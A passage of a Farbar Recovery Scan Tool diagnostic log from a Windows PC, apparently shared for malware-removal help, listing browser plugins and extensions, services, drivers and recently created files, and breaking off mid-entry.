href="https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}" target="_blank">https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}" target="_blank">https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>BHO: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>BHO: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft)</p><p>BHO-x32: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)</p><p>BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p>BHO-x32: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)</p><p>BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft)</p><p>Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p>Tcpip\Parameters: [DhcpNameServer] 192.168.1.1</p><p></p><p>FireFox:</p><p>========</p><p>FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)</p><p>FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll ( HP)</p><p>FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)</p><p>FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)</p><p>FF Plugin-x32: @kaspersky.com/content_blocker_6418E0D362104DADA084DC312DFA8ABC -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a> ()</p><p>FF Plugin-x32: @kaspersky.com/online_banking_69A4E213815F42BD863D889007201D82 -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a> ()</p><p>FF Plugin-x32: @kaspersky.com/virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a> ()</p><p>FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)</p><p>FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)</p><p>FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL (Nero AG)</p><p>FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)</p><p>FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)</p><p>FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)</p><p>FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)</p><p>FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()</p><p>FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com">content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a></p><p>FF Extension: Dangerous Websites Blocker - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a> [2014-12-01]</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com">virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a></p><p>FF Extension: Virtual Keyboard - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a> [2014-12-01]</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com">online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a></p><p>FF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a> [2014-12-01]</p><p></p><p>Chrome: </p><p>=======</p><p>CHR Profile: C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default</p><p>CHR Extension: (Google Docs) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-08]</p><p>CHR Extension: (Google Drive) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-08]</p><p>CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-23]</p><p>CHR Extension: (YouTube) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-08]</p><p>CHR Extension: (Google Search) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-08]</p><p>CHR Extension: (Kaspersky Protection) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-12-01]</p><p>CHR Extension: (Website Logon) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\fegekclkdhbnfdcmomlpegkkndgnmfmo [2014-05-08]</p><p>CHR Extension: (Google Wallet) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-08]</p><p>CHR Extension: (Gmail) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-08]</p><p>CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - <a href="https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho" target="_blank">https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho</a> []</p><p>CHR HKLM-x32\...\Chrome\Extension: [fegekclkdhbnfdcmomlpegkkndgnmfmo] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2012-07-12]</p><p></p><p>==================== Services (Whitelisted) =================</p><p></p><p>(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)</p><p></p><p>R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [39528 2011-09-16] (ArcSoft Inc.)</p><p>S2 AVP15.0.1; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\avp.exe [234520 2014-08-30] (Kaspersky Lab ZAO)</p><p>R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed]</p><p>R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641320 2012-08-10] (HP)</p><p>R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-10] (Hewlett-Packard Company) [File not signed]</p><p>R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)</p><p>R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)</p><p>R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)</p><p>R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2011-02-04] (Nalpeiron Ltd.) [File not signed]</p><p>R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [321536 2012-07-21] (IDT, Inc.) [File not signed]</p><p>S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]</p><p>R3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401256 2012-07-16] (AuthenTec, Inc.)</p><p>R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]</p><p>S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-21] (Microsoft Corporation)</p><p></p><p>==================== Drivers (Whitelisted) ====================</p><p></p><p>(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)</p><p></p><p>R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)</p><p>R0 cm_km_w; C:\Windows\System32\DRIVERS\cm_km_w.sys [238288 2013-01-14] (Kaspersky Lab UK Ltd)</p><p>S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-01] ()</p><p>R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [468576 2014-03-31] (Kaspersky Lab ZAO)</p><p>R2 kldisk; C:\Windows\system32\DRIVERS\kldisk.sys [46144 2014-07-02] (Kaspersky Lab ZAO)</p><p>S0 klelam; C:\Windows\System32\DRIVERS\klelam.sys [29616 2012-07-27] (Kaspersky Lab)</p><p>R3 klflt; C:\Windows\system32\DRIVERS\klflt.sys [150536 2014-08-18] (Kaspersky Lab ZAO)</p><p>R1 klhk; C:\Windows\system32\DRIVERS\klhk.sys [247480 2014-08-12] (Kaspersky Lab ZAO)</p><p>R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [801288 2014-08-20] (Kaspersky Lab ZAO)</p><p>R1 KLIM6; C:\Windows\system32\DRIVERS\klim6.sys [30304 2014-02-25] (Kaspersky Lab ZAO)</p><p>S3 klkbdflt; C:\Windows\system32\DRIVERS\klkbdflt.sys [28768 2014-03-28] (Kaspersky Lab ZAO)</p><p>S3 klmouflt; C:\Windows\system32\DRIVERS\klmouflt.sys [29280 2013-08-08] (Kaspersky Lab ZAO)</p><p>R1 klpd; C:\Windows\system32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)</p><p>R1 klwfp; C:\Windows\system32\DRIVERS\klwfp.sys [69816 2014-07-25] (Kaspersky Lab ZAO)</p><p>R1 Klwtp; C:\Windows\system32\DRIVERS\klwtp.sys [74424 2014-08-13] (Kaspersky Lab ZAO)</p><p>R1 kneps; C:\Windows\system32\DRIVERS\kneps.sys [179776 2014-07-09] (Kaspersky Lab ZAO)</p><p>R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)</p><p>R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-01] (Malwarebytes Corporation)</p><p>R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation)</p><p>S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)</p><p>R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)</p><p>U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys [34808 2014-11-19] ()</p><p>R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)</p><p>S3 ALSysIO; \??\C:\Users\ADMINI~1\AppData\Local\Temp\ALSysIO64.sys [X]</p><p>S1 bcbus; \SystemRoot\System32\drivers\bcbus.sys [X]</p><p>R4 klkbdflt2; \SystemRoot\system32\DRIVERS\klkbdflt2.sys [X]</p><p></p><p>==================== NetSvcs (Whitelisted) ===================</p><p></p><p>(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)</p><p></p><p></p><p>==================== One Month Created Files and Folders ========</p><p></p><p>(If an entry is included in the fixlist, the file\folder will be moved.)</p><p></p><p>2014-12-01 09:39 - 2014-12-01 09:39 - 00002330 _____ () C:\Users\johnsmith\Desktop\Safe Money.lnk</p><p>2014-12-01 09:38 - 2014-12-01 09:38 - 00002132 _____ () C:\Users\Public\Desktop\Kaspersky Internet Security.lnk</p><p>2014-12-01 09:38 - 2014-12-01 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security</p><p>2014-12-01 09:38 - 2013-05-06 09:13 - 00110176 _____ (Kaspersky Lab ZAO) C:\Windows\system32\klfphc.dll</p><p>2014-12-01 09:36 - 2014-12-01 09:43 - 00000000 ____D () C:\ProgramData\Kaspersky Lab</p><p>2014-12-01 09:36 - 2014-12-01 09:36 - 00000000 ____D () C:\Program Files (x86)\Kaspersky Lab</p><p>2014-12-01 09:36 - 2014-08-20 18:04 - 00801288 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klif.sys</p><p>2014-12-01 09:36 - 2014-08-18 14:43 - 00150536 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klflt.sys</p><p>2014-12-01 09:36 - 2014-08-12 18:32 - 00247480 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klhk.sys</p><p>2014-12-01 09:28 - 2014-12-01 09:28 - 05005408 _____ () C:\Windows\system32\FNTCACHE.DAT</p><p>2014-12-01 09:25 - 2014-11-20 13:56 - 00713672 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe</p><p>2014-12-01 09:25 - 2014-11-20 13:56 - 00106440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl</p><p>2014-12-01 07:58 - 2014-12-01 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)</p><p>2014-12-01 07:58 - 2014-12-01 07:58 - 00000117 _____ () C:\Windows\system32\netcfg-763703.txt</p><p>2014-12-01 07:57 - 2014-12-01 08:59 - 00000000 ____D () C:\Users\johnsmith\Desktop\mbar</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-627218.txt</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-624156.txt</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-618343.txt</p><p>2014-12-01 07:51 - 2014-12-01 07:51 - 00001139 _____ () C:\Windows\system32\netcfg-333515.txt</p><p>2014-12-01 07:51 - 2014-12-01 07:51 - 00001134 _____ () C:\Windows\system32\netcfg-329937.txt</p><p>2014-12-01 07:48 - 2014-12-01 07:48 - 00000117 _____ () C:\Windows\system32\netcfg-157515.txt</p><p>2014-12-01 07:47 - 2014-12-01 07:47 - 00043664 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys</p><p>2014-12-01 07:22 - 2014-12-01 07:37 - 16448208 _____ (Malwarebytes Corp.) C:\Users\johnsmith\Desktop\mbar-1.08.2.1001.exe</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 01519104 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 01484288 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\vsstrace.dll</p><p>2014-12-01 01:34 - 2014-10-08 20:59 - 01195520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll</p><p>2014-12-01 01:34 - 2014-10-08 20:59 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vsstrace.dll</p><p>2014-12-01 01:34 - 2012-09-19 23:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\eventcls.dll</p><p>2014-12-01 01:34 - 2012-09-19 22:53 - 00015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eventcls.dll</p><p>2014-11-30 23:38 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe</p><p>2014-11-30 23:38 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe</p><p>2014-11-30 23:23 - 2014-10-11 00:44 - 19764736 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll</p><p>2014-11-30 23:23 - 2014-10-10 22:57 - 17562112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:59 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:59 - 00212992 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:58 - 00458240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll</p><p>2014-11-30 23:23 - 2014-09-21 22:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll</p><p>2014-11-30 23:23 - 2014-09-21 20:56 - 00513536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll</p><p>2014-11-30 23:23 - 2014-04-19 02:39 - 00628024 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe</p><p>2014-11-30 23:23 - 2014-04-19 01:45 - 00693760 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll</p><p>2014-11-30 23:23 - 2014-04-19 01:45 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll</p><p>2014-11-30 23:23 - 2014-04-18 23:57 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll</p><p>2014-11-30 23:23 - 2014-04-18 23:57 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll</p><p>2014-11-30 23:23 - 2014-01-30 17:48 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:45 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:44 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:44 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:43 - 02307072 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:58 - 08858624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:57 - 02416640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:57 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:56 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll</p><p>2014-11-30 23:19 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll</p><p>2014-11-30 23:19 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll</p><p>2014-11-30 23:19 - 2013-12-04 16:43 - 00583680 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll</p><p>2014-11-30 23:19 - 2013-12-04 16:37 - 00451072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll</p><p>2014-11-30 23:19 - 2013-03-02 01:23 - 00375808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll</p><p>2014-11-30 23:19 - 2013-03-01 19:44 - 01011200 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll</p><p>2014-11-30 23:19 - 2012-12-14 21:55 - 00443392 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll</p><p>2014-11-30 23:18 - 2013-11-22 23:43 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll</p><p>2014-11-30 23:18 - 2013-11-22 22:05 - 00368640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll</p><p>2014-11-30 23:18 - 2013-08-23 00:22 - 02062848 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll</p><p>2014-11-30 23:18 - 2013-08-22 18:44 - 01711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll</p><p>2014-11-30 23:18 - 2013-03-21 20:49 - 02382336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll</p><p>2014-11-30 23:18 - 2013-03-21 15:47 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll</p><p>2014-11-30 23:17 - 2014-01-30 17:48 - 01339392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll</p><p>2014-11-30 23:17 - 2014-01-30 17:06 - 01628160 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll</p><p>2014-11-30 23:17 - 2013-10-31 22:38 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll</p><p>2014-11-30 23:17 - 2013-10-31 20:49 - 00273408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msieftp.dll</p><p>2014-11-30 23:17 - 2013-04-02 16:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptdlg.dll</p><p>2014-11-30 23:17 - 2013-04-02 16:12 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\cryptdlg.dll</p><p>2014-11-30 23:17 - 2012-12-12 21:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll</p><p>2014-11-30 23:17 - 2012-12-12 20:59 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll</p><p>2014-11-30 23:06 - 2014-10-30 04:25 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe</p><p>2014-11-30 21:55 - 2014-11-30 21:55 - 00002362 _____ () C:\Windows\system32\.crusader</p><p>2014-11-30 21:38 - 2014-11-30 21:55 - 00000000 ____D () C:\ProgramData\HitmanPro</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00001893 _____ () C:\Users\Public\Desktop\HitmanPro.lnk</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\Program Files\HitmanPro</p><p>2014-11-30 21:35 - 2014-10-31 23:26 - 103374192 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe</p><p>2014-11-30 21:30 - 2014-11-30 21:35 - 32507072 _____ (Microsoft Corporation) C:\Users\johnsmith\Downloads\Windows-KB890830-x64-V5.18.exe</p><p>2014-11-30 21:28 - 2014-11-30 21:36 - 11222744 _____ (SurfRight B.V.) C:\Users\johnsmith\Downloads\HitmanPro_x64.exe</p><p>2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\Users\johnsmith\Desktop\removal tools</p><p>2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\FRST</p><p>2014-11-30 20:48 - 2014-11-30 20:48 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\johnsmith\Downloads\tdsskiller.exe</p><p>2014-11-30 20:34 - 2014-11-30 20:34 - 00000117 _____ () C:\Windows\system32\netcfg-26750.txt</p><p>2014-11-30 20:33 - 2014-11-30 20:33 - 00000117 _____ () C:\Windows\system32\netcfg-2834125.txt</p><p>2014-11-30 20:23 - 2014-11-30 20:29 - 00000000 ____D () C:\Users\johnsmith\Desktop\ReportMaker</p><p>2014-11-30 20:09 - 2014-11-30 20:10 - 06360161 _____ () C:\Users\johnsmith\Downloads\ReportMaker.1417400617.exe</p><p>2014-11-30 20:01 - 2014-12-01 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys</p><p>2014-11-30 20:00 - 2014-12-01 07:57 - 00096472 _____ (Malwarebytes 